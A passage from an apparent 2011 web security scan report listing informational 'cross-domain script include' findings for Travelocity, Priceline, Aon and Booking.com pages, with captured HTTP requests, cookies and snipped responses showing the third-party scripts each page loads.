User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen,all" href="http://i.travelpn.com.edgesuite.net/11.10/css/HF_hotels_overrides.css"/>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/navigation.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/global.js"></script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/hotels.js"></script>
...[SNIP]...
<link type="text/css" href="http://i.travelpn.com.edgesuite.net/11.10/css/calendar_datepicker.css" rel="stylesheet" />
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/jquery.min.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jquery/ui/jquery.ui.core.js"></script>
<script language="javascript" type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/calendar_datepicker.js"></script>
...[SNIP]...
<body id="hot" class="hotdet" onload="on_load_search();reloadEvents('workspace')" >
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/mbox.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://travelocity.ugc.bazaarvoice.com/static/0025-en_us/bvapi.js"></script>
...[SNIP]...
<!-- ClickToCall enabled -->
<script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/11.10/js/tracking_tags_US.js"></script>
...[SNIP]...

20.41. http://travela.priceline.com/hotel/newHotelSearch.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 192
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:37 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8F1936C519E8273F266A95D7A4654200; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491027


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

20.42. http://travela.priceline.com/hotel/searchResults.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A33FF447E496BF38ED169D142CD825A3; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/17799/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- ATG_AVAILABLE_A20 -->

<script type="text/javascript" src="//static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

20.43. http://www.aon.com/manchesterunited/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aon.com
Path:   /manchesterunited/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /manchesterunited/ HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/unitedin2010/?lid=aonbutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Sun, 02 Oct 2011 23:59:06 GMT
Content-Length: 12997

<!DOCTYPE html>
<html lang="en">
   <head>
       <meta charset="utf-8" />
       <title> Aon and Manchester United: We are United </title>
       <link rel="stylesheet" href="styles.css" media="screen"/>
       <script src="http://cdn.jquerytools.org/1.2.2/full/jquery.tools.min.js"></script>
...[SNIP]...
<!-- video player overlay. -->
       <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

20.44. http://www.booking.com/general.en-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /general.en-us.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/about HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.6.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=5.31764388084412

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:31:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUFsPGDw%2F3YvsmbEMnpK9%2F5N%2B025mTgFVBfR64%2FgKzgcZwS2BG%2FpVqxxgeiiGa2Aij6eAdFCIoFktHJRCU7t6pG8eYurfp1mo97MaE6Xt3SQiUpot4wcm%2Ful3h2cCp3Aq3v9fFndje7J5kBuXpqwKFwzq1d8NFsqOMXkMLOh8MheA4SvhsDED1JW8Lzq1pPPuNWkLtLa2nYu4GrPir7OHtXIl44wyZZqW%2BoUI25Qt%2Bq%2FThnN11dNMvpllwZf%2BFUGaF0yEYQWfEUxqgLGBTcGCbPL2PoJSvzs3aJcz6peq6OJcz0X3v8XJzxlrl3Re%2B4fMPNVGOKw3OXRjD9BApu3kdB%2B4DfNedCdH7nvJIk8bHMsdAXvWaipTAaEEr77iSzcDzu0k4Pb0VGYDgJMguGhKAboI9qdT5%2FfoxQD1ZO10v0YKUwppRIyD0a3Ln9PUrxwZkhSSkHFlrAVjent8lv1qDG2xdp9lmPdV5vh3rRmuN1Lz0QN%2F3V2Sn9fPeJsHrK0pcgOYpSyW0n95GoFoyAkBhI17Phwo7yrvrjeDNHmxKMRkraR5MdqFJBuwCVd9dBvXoVyxW413W13jwOQsaHZx8iPdphluzMD5h3jwOEjlDkBpFkAF0kJZnoHDtUP3l1iRU%2FdEKfImnJ%2FQISsSKIW2wR5lSf%2F1SximqCADYBfEBvNs%2Bb4p%2BXQ0a42SQI1HuZMn7XZ3eadU1vaR0aacQEhT%2BTMbKt5QCA48TalbFf5k5egYBg9r%2B4N8uoiUgQQYx%2Ftt5AO9%2FVBRh7aJptr3L4saF02KTAh9Z0p5%2Fihhjlsn4hE28vhAsssqhO3O8S8giS%2BAD9yLu1raMti3QMcj0gfOfbUXo26HhPHD3cS56Ly4PlQzJm6UrwqCaLpO7KTYRTBFNfjq%2FicOkR6pMNZ1%2FC%2Fc0eZGJAjprFnEfcz%2Ff1D2udPGhpbVYLpVeRCyKbNt53ggYIGQr1TTkJ7xhSCCOCzTUXuE6dUGpUiWBZ7%2F3AHIMw6FvtaQBTat%2FQXE6ame41kAL%2B6V00yN0Xmopzv5yDpjigEcOO5oIMkGwsHdniwwtzhwSITaOyh2%2FKP0tbPU%2FCeKxA16ayEzJ5YKOenV4WVCjaYstXg3Le9A%2B%2BgxuR7X2ojY6dDXatodt%2F5RDf3maagBIdR6Oc6ZIKCZVYQTZjElDDZ8cp%2FgiTlLo6jDqUUyssnkr6X3M%2FAjD%2BrZNH8IuQKQM72Zu1cjPHJxdgPqO%2BOs%2F7rRh9o%2FTf5CKOGhXuc0PdC22WNwtICZpDHs8KyH%2F%2FopDWQBPuGzYzztul5MGNxkOl4zCU0jr3252eba8xA1Mw3aePG1Sf%2F8UQEgao7bg13Co2dpibytVWXIz1SXqF3vHV2vONIMhbOr0HejT8ddOxSgNDag0VIm1OAYgAbMxdRRA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:31:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59658
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...

20.45. http://www.booking.com/hotel/us/c-boston-massachusettes.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74mwWA2qRP9ibjLlGSkGnixIN53jQSEFpZ%2Btt%2FEJbWxCwnNo9PFCYgujcC5zr%2FNnG2SXj%2FlwkxJh0Rlt6OoCAfAXC3G1Glp4pwRM49T3YD64Tefl5B%2BA6FojZRWNPqfRuwCMgCSmHsFJeZKeepvzYPcawzb3ElmfM8U3kB%2B0xUq4ewe4gLbFQ0okcCs2oila3oQmChJIOFelhvhIn3j4XqTiKyB%2BzNUZJLBDJC9FMQQsn%2F99mmnY3TlC%2FB6EQg2nU50Pd4t5idoU7FR6PL8ulD098rM8qIHr2I0DBfTZZ1JTx2qAEhooN7rqEfROrFcBxEYba%2FtDUB7St7FdNyKXMz4h1eh9eWzHmGeQIFzoBcbrv7%2FOlyH18uHrrwywNNBs%2B6CPYsZxHSrLNYNkA3p54cJwVJJtADgBE9vkTKuoaRbmXXXYcQ86rDIbGJUCDA2j0x8fpuMDPY2mQ%2BCdx%2FNusXDhxf%2BA0ZMhno3cUHHRqbWpereTJlY2vVu5h1Y2q7Cfi6ApwJWDv%2BfuO98fIM%2Fhu%2FX%2B0SLvl%2B%2Fjx1LGZc1US2Gz1ZieDavXXvciTa6rXmIm2%2FdKvW7s4q2AwZtOX30qxBGshCyJgjKtgjiMCxDyxFVdf7EcVq4JTOguZfxVqHRR%2B%2Fcy%2BSAsTRg9zqx%2FtST2kRIticJJiOXs6ArJfMau9s79Jc%2FA8jvUPg%2F2bBTHy7Yjm1PE3illu56a6dgj0n1%2Fyb0UCfVwE5jRsU%2BKkT7s7cUmVhAVhZ9usxmGKlwYdTA2rY%2FaI9lxsClMjpiDXHCWmXJc2FaVspfJMjtvDmIanyPF9zgnyRRAeWeq73NdAIQVD9Zkcn0w3u78GbuMZtBlzzxK9usz%2BTZzzq0pw5svZbpRvL0MkGkwvD7cMgq0i%2F6a1NX3K1Ch4yWCS%2BHLRvlcSHdTUywk0u%2B0xmqD2%2Bxg8uxhsE1%2FdvBw93mjrIZu5AP3L4MmqoA9edCGGVPgqIJBf01YcyckRX0%2F0cTNB3u%2Bl5Ype%2FywAfb%2Fa8awDp9BWNKgj%2B6EqGsglDnmUWQN3JweXVWhgzBOpzywYIa2d4nWm0alm9aDppC34Dcx8P7tuThuOduYpc1bkAp%2FVnuVGE9T8ESzu%2B9adrUWruCp%2BLpAUvAIiGYGNFTgEAiQCQ8xz2aIjBa1urHpuk2GZtYTUi4j5ROFYT4DXZ1IAVCPuvuTFnqiS2HnjKi4xJXmNmkg8rBg9xWoDZ%2BH0wwqRX4iZWOY3i5iNEwebqtaoie%2BP7r6G%2FLQUM7pXZ4w0OMpQMyQi%2FVFaQETCe9980e9NIYR8OQkNVLofepzbE1hCbxXn6Q0kJJKpE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:02:15 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232378
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>
...[SNIP]...
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/hotel.1191.js"></script>
...[SNIP]...

20.46. http://www.booking.com/hotel/us/copley-square.en-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw